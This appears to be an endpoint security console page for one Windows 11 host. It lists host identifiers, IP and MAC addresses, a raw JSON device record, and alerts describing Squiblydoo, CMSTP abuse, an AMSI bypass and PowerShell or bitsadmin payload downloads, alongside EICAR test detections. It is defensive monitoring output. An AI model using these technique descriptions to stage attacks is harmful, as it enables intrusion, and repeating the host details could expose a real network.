BOOK-R0BE6S1NC3
Normal
- Device ID
024efd237c2d4f87958607652cb04c8b- 호스트명
- BOOK-R0BE6S1NC3
- Local IP
- 172.27.1.19
- External IP
- 119.206.248.238
- 플랫폼
- Windows
- OS 버전
- Windows 11
- Agent 버전
- 7.31.20309.0
- 처음 연결
- 2025-12-18 08:48:15
- 마지막 연결
- 2025-12-22 08:28:33
Tags
태그 없음
Related Alerts
전체 보기
| 심각도 | 설명 | 시간 |
|---|---|---|
| Informational | A suspicious process was identified by CrowdStrike. Review the process tree. | 12-22 08:07 |
| Informational | A suspicious process was identified by CrowdStrike. Review the process tree. | 12-22 08:07 |
| Informational | A process has written a known EICAR test file. Review the files written by the triggered process. | 12-22 08:02 |
| High | A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. | 12-22 08:02 |
| High | A CMSTP.exe process appears to have been supplied with a suspicious INF file. CMSTP.exe may be abused to load and execute DLLs andor COM scriptlets SCT from remote servers. Review the command line. | 12-22 08:02 |
| High | A PowerShell script attempted to bypass Microsoft's AntiMalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script. | 12-22 08:02 |
| High | A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. | 12-22 08:02 |
| High | A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line. | 12-22 08:02 |
| Informational | A process has written a known EICAR test file. Review the files written by the triggered process. | 12-22 08:01 |
| High | A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. | 12-22 08:01 |
Raw JSON Data
{"device_id":"024efd237c2d4f87958607652cb04c8b","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.20309.0","hostname":"BOOK-R0BE6S1NC3","local_ip":"172.27.1.19","external_ip":"119.206.248.238","mac_address":"00-72-ee-3e-51-84","platform_name":"Windows","os_version":"Windows 11","system_product_name":"960QHA","status":"normal","first_seen":"2025-12-17T23:48:15Z","last_seen":"2025-12-21T23:28:33Z","tags":[],"groups":["4f5aa5f1cdc6441982cf5c58e4b5d75a"],"group_hash":"fb152e9135984fe6b0778b98d0f86fd4060a555e6c7baa220904d1a05b5e7961","policies":[{"policy_type":"prevention","policy_id":"64c665c08ab745759d0a84d7db7a784d","applied":true,"applied_date":"2025-12-18T00:00:22.989910659Z"}],"reduced_functionality_mode":"no","is_online":false,"FirstSeenAt":"2025-12-18T08:48:15+09:00","LastSeenAt":"2025-12-22T08:28:33+09:00"}
Status
- Connection Offline
- Isolation Normal
- 관련 알림 10
Actions
Uninstall Token
센서 삭제 시 필요한 토큰입니다. Uninstall Protection이 활성화된 경우에만 필요합니다.